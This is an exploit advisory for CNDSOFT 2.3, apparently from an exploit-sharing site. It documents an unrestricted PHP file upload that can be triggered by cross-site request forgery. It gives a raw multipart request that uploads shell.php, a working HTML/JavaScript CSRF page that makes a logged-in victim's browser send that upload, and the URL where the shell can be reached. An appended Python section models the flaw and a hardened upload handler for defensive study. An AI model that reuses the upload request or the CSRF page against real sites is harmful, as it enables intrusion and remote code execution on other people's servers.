CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload
Posted on 20 October 2016
=========================================================================================================
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)
# Author: Besim
# Google Dork: -
# Date: 19/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: -
# Software Link: http://www.phpexplorer.com/Goster/1227
# Version: 2.3
=========================================================================================================

Vulnerable URL and Parameter
========================================
Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla
Vulnerable Parameter = kullanici_resmi (the file upload field of the user creation form)

TECHNICAL DETAILS & POC & POST DATA
========================================

POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla aa
Content-Type: multipart/form-data; boundary=---------------------------5035863528338
Content-Length: 1037

-----------------------------5035863528338
Content-Disposition: form-data; name="utf8"

a
-----------------------------5035863528338
Content-Disposition: form-data; name="authenticity_token"

CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_adi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_sifresi"

meryem
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_mail_adresi"

m@yop.com
-----------------------------5035863528338
Content-Disposition: form-data; name="MAX_FILE_SIZE"

30000
-----------------------------5035863528338
Content-Disposition: form-data; name="kullanici_resmi"; filename="shell.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
-----------------------------5035863528338
Content-Disposition: form-data; name="personel_maasi"

5200
-----------------------------5035863528338--

The server stores the part named kullanici_resmi under personel_resimleri/ with the client-supplied file name and does not restrict the extension or content, so a .php file is written into the web root and executed on the next request.

CSRF PoC - File Upload (Shell.php)
========================================

<html>
  <!-- CSRF PoC: replays the upload above from any page the logged-in victim visits -->
  <body>
    <script>
      function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://site_name/ofis/index.php?is=kullanici_tanimla", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");
        xhr.withCredentials = true; // send the victim's session cookie with the forged request
        var body = "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"utf8\"\r\n" +
          "\r\n" +
          "\xe2\x9c\x93\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"authenticity_token\"\r\n" +
          "\r\n" +
          "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n" +
          "\r\n" +
          "meryem\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +
          "\r\n" +
          "m@yop.com\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
          "\r\n" +
          "30000\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\x3c?php\r\n" +
          " phpinfo();\r\n" +
          "\r\n" +
          " ?\x3e\r\n" +
          "-----------------------------5035863528338\r\n" +
          "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +
          "\r\n" +
          "5200\r\n" +
          "-----------------------------5035863528338--\r\n";
        // send the body byte for byte so the multipart framing is not re-encoded by the browser
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

========================================
Access File: http://www.site_name/path/personel_resimleri/shell.php

RISK
========================================
An attacker can upload arbitrary files, including PHP code, into the web root and execute them. Because the upload form is not protected against CSRF, the upload can also be triggered from a third-party page visited by an authenticated user. Note that the PoC reuses the authenticity_token value from the captured request, so the cross-site variant only succeeds if the application does not bind that token to the victim's session.

-- Besim ALTINOK
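The following is an added example, not part of the advisory and not CNDSOFT's own PHP code. It models, in Python, the two defects the advisory exposes and what a fixed handler has to do instead: the upload part is stored under the client-chosen name with no content check, and the authenticity_token field is accepted without being tied to the session. The field names, boundary, upload directory and shell.php payload are taken from the PoC above; the session token, the PNG header and the parser/validator functions are constructed for illustration.

```python
# Added example (not CNDSOFT's code): a minimal multipart builder and parser,
# the upload handling the advisory reports (vulnerable_store) and a hardened
# version (hardened_store) plus a session-bound CSRF check. Field names,
# boundary, directory and payload come from the PoC; the rest is assumed.
import hmac
import os
import re
import secrets

BOUNDARY = b"---------------------------5035863528338"   # boundary used by the PoC
UPLOAD_DIR = "personel_resimleri"                         # directory named in the advisory


class UploadRejected(Exception):
    pass


def build_multipart(fields, file_field, filename, content_type, data, boundary=BOUNDARY):
    """Build a multipart/form-data body with CRLF framing, as the PoC's JavaScript does."""
    lines = []
    for name, value in fields.items():
        lines += [b"--" + boundary,
                  b'Content-Disposition: form-data; name="' + name.encode() + b'"',
                  b"", value.encode("utf-8")]
    lines += [b"--" + boundary,
              b'Content-Disposition: form-data; name="' + file_field.encode()
              + b'"; filename="' + filename.encode() + b'"',
              b"Content-Type: " + content_type.encode(),
              b"", data]
    lines += [b"--" + boundary + b"--", b""]
    return b"\r\n".join(lines)


def parse_multipart(body, boundary=BOUNDARY):
    """Minimal RFC 7578 parser: {name: (filename or None, content type or None, payload)}."""
    parts = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):                       # closing delimiter
            break
        head, _, payload = chunk[2:].partition(b"\r\n\r\n")   # skip CRLF after delimiter
        if payload.endswith(b"\r\n"):                     # CRLF belongs to the next delimiter
            payload = payload[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?:^|;)\s*name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        if name:
            parts[name.group(1)] = (fname.group(1) if fname else None,
                                    headers.get("content-type"), payload)
    return parts


def vulnerable_store(upload):
    """Behaviour the advisory reports: client-chosen name kept, nothing checked."""
    filename, _content_type, _data = upload
    return UPLOAD_DIR + "/" + filename


# Allowlisted extensions and the magic bytes each must start with (assumed policy).
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff",
           ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}
PHP_OPEN_TAG = re.compile(rb"<\?")   # "<?" alone also covers short_open_tag


def hardened_store(upload, max_size=30000):
    """Allowlist the extension, verify magic bytes, scan for a PHP tag, enforce the
    size server-side (the form's MAX_FILE_SIZE is only a client hint) and store under
    a random name. The client's Content-Type is ignored: the PoC sends
    application/octet-stream, and an attacker can send image/png just as easily."""
    filename, _content_type, data = upload
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected("extension %r not allowed" % ext)
    if len(data) > max_size:
        raise UploadRejected("file too large")
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not match %s" % ext)
    if PHP_OPEN_TAG.search(data):
        raise UploadRejected("PHP open tag inside upload")
    return UPLOAD_DIR + "/" + secrets.token_hex(16) + ext


def csrf_ok(session_token, submitted_token):
    """The PoC replays a token copied from the attacker's own capture; that only works
    if the server never compares it with the victim's session token. Compare in
    constant time and refuse empty values."""
    if not session_token or not submitted_token:
        return False
    return hmac.compare_digest(session_token.encode(), submitted_token.encode())


# Constructed sample input mirroring the PoC (field values as in the advisory).
FIELDS = {"utf8": "\u2713",
          "authenticity_token": "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=",
          "kullanici_adi": "meryem", "kullanici_sifresi": "meryem",
          "kullanici_mail_adresi": "m@yop.com", "MAX_FILE_SIZE": "30000",
          "personel_maasi": "5200"}
SHELL = b"<?php phpinfo(); ?>"                                   # payload from the PoC
PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 13      # constructed PNG header


def handle(body, session_token):
    """Run one request through both handlers; returns what each would store."""
    form = parse_multipart(body)
    upload = form["kullanici_resmi"]
    submitted = form["authenticity_token"][2].decode()
    result = {"csrf_ok": csrf_ok(session_token, submitted),
              "vulnerable_path": vulnerable_store(upload),   # stored regardless of token
              "hardened_path": None, "reason": None}
    if not result["csrf_ok"]:
        result["reason"] = "CSRF token mismatch"
        return result
    try:
        result["hardened_path"] = hardened_store(upload)
    except UploadRejected as exc:
        result["reason"] = str(exc)
    return result


if __name__ == "__main__":
    poc = build_multipart(FIELDS, "kullanici_resmi", "shell.php", "application/octet-stream", SHELL)
    print(handle(poc, session_token="victim-session-token"))     # assumed victim token
    print(handle(poc, session_token=FIELDS["authenticity_token"]))
    benign = build_multipart(FIELDS, "kullanici_resmi", "avatar.png", "image/png", PNG)
    print(handle(benign, session_token=FIELDS["authenticity_token"]))
```

Running it shows the PoC body landing at personel_resimleri/shell.php in the vulnerable model while the hardened model first refuses the replayed token and, even with a matching token, refuses the .php extension; a .png name wrapped around the same PHP payload fails the magic-byte check, and a real PNG header with a PHP tag appended fails the tag scan. The tag scan is a defence-in-depth measure, not a substitute for the allowlist and for storing uploads outside the web root.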